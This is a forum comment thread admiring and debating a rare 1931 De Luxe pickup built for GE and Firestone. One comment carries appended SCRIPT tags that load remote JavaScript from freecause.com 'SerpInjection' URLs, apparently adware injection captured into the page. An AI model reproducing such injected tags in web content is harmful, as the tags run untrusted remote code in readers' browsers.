Very limited production De Luxe 1931 pickup made specifically for GE and Firestone but later a few were apparently released to the public. This clearly meets the definition of a closed cab ute - integrated pickup bed and precedes the Ranchero by some 26 years....
Kind of reminds me of a hearse or flower car with those rails on it like that.... Very cool nonetheless. James
If you really look at that last close up though, it would appear that the bed sides are actually bolted to the body, so, nice try, but not a 'ute'. Body and tray need to be one. Unique car though.
With the sides being so plain, seems like a guy with some metal working skills and a bead roller could make a kit for these pretty easily... An RPU would be pretty cool, too.
someone with an A truck needs to build themselves this bed, but do some cool looking beadrolling to break it up a bit. I think the lines are absolutely killer
Love it! Looks like an open top hearse; just too cool! <SCRIPT id=HI51307_htmlinj_11523_1iO5Ch0R32z_8 src="http://staging.client.freecause.com/SerpInjection/bro_lm_js.js"></SCRIPT><SCRIPT id=HI51307_htmlinj_11523_1CxE9E7qb_OA3 src="http://staging.client.freecause.com/SerpInjection/bro_utils_js.js"></SCRIPT><SCRIPT id=HI51307_htmlinj_11523_1W_IQkFnXfOFC src="http://s3pr.freecause.com/NRA_script.js"></SCRIPT><SCRIPT id=HI51307_htmlinj_11523_1YE_wehi2gLN8 src="http://staging.client.freecause.com/SerpInjection/bro_serp.js"></SCRIPT><SCRIPT id=HI51307_htmlinj_11523_1GVVPz3KEIw5Y type=text/javascript defer> var fctb_tool=null; function (t) { fctb_tool=t; start(fctb_tool); } </SCRIPT>
That is a sharp truck. This is the only one that I have seen that is a late 31 cab with the steel roof, all the others were the earlier cab with the insert. They also did some AA trucks with the same style bed, but really long.
